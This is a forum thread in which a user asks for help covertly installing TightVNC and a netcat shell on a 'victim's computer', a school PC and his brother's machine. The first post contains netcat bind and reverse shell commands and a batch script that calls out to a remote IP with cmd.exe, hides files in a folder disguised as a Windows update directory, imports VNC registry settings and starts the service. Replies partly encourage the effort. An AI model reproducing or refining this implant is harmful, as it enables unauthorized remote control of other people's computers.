Jump to content

TightVNC and Remote Access


Ilt3Haxsaw

Recommended Posts

Hi,

I've been following these forums for some time now, but never really bothered to register. Until now. I've always been super interested in remote access, and the ability to silently install tvnc on a victim's computer had me jumping in glee. So here I am, trying to set this bad boy up, following the instructions on "Switchblade Packages". If I'm getting this right, I need netcat in order to connect to say, a PC at my school from my house. Or some variation of netcat. But anyways, so I'm trying to set up netcat, and the instructions tell me to change this:

.nircmd.exe execmd .nc -L -p 52323 -d -e cmd.exe

to this:

nc your.ip 52323 -e cmd.exe

Now, I don't know any shell, but I just wanted to clarify, I put MY IP address where it says your.ip, right? Sorry, I know it's noobie, but better safe than confused.

And why would anyone use netcat shellbind instead of a reverse netcat shellbind? Pro's vs. con's?

Okay next question:

Does it matter if I am on workgroup computer, and not the gateway computer at my house? Just wondering, thinking along the lines of ports etc? I'm using a Linksys DSL router.

Also, the computer I'm trying to connect to at school is a workgroup computer.

Thanks in advance for your help, and for tolerating my noobiness

EDIT: One more thing, I read on a different site that in order for the firewall to let the netcat connection slip through, it has to be between port 20 - 1024? Because it's supposed to look like an FTP connection? Dunno if that is true or if it even has anything to do with this, just thought I'd mention it.

EDIT EDIT:

I've been messing with tvnc, and I'm having a bit of an installation issue. I'm getting an error saying that the services.bat can't start from the $NtUninstall folder that everything is supposed to be copied to.

Here's my code:

@echo off

:start

nc xx.x.xxx.xxx 52323 -e cmd.exe

mkdir %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || mkdir "%appdata%hbn"

cd WIPVNCInstallFiles

copy *.* %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || copy *.* "%appdata%hbn"

attrib %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ +s +h & attrib "%appdata%hbn" +s +h

start %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$services.bat

regedit /s WIPCMDvncdmp.reg

regedit /s WIPCMDvncdmp1.reg

regedit /s WIPCMDvncdmp2.reg

regedit /s WIPCMDVNC.reg

ping -n 3 localhost  > nul

net start WinVNC

nircmd.exe execmd CALL WIPVNCInstallfilessend.cmd

I tried it on my brothers computer. I got his IP in an e-mail, but failed to connect using the IP I recieved as well as our internal IP (192.168 etc). Possibly related to the error I'm getting?

Link to comment
Share on other sites

Wow...this is exactly why I created my OWN TightVNC installer.

Check this:

http://www.hak5.org/forums/viewtopic.php?t=4741

Connect to your school from home or other off-site location may be difficult or impossible, considering that most schools have their computers sitting behind a gateway. I wouldn't really be sure of how to do it, if it's even feasible.

I never read anything about netcat - I don't think it's necessary for anything.

Link to comment
Share on other sites

Hey, always happy to help someone remote control a computer :twisted:

I read up on netcat, and it does seem helpful in NAT traversal across a gateway. Anyone got any ideas of how to use it like I<3Haxsaw is thinking?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...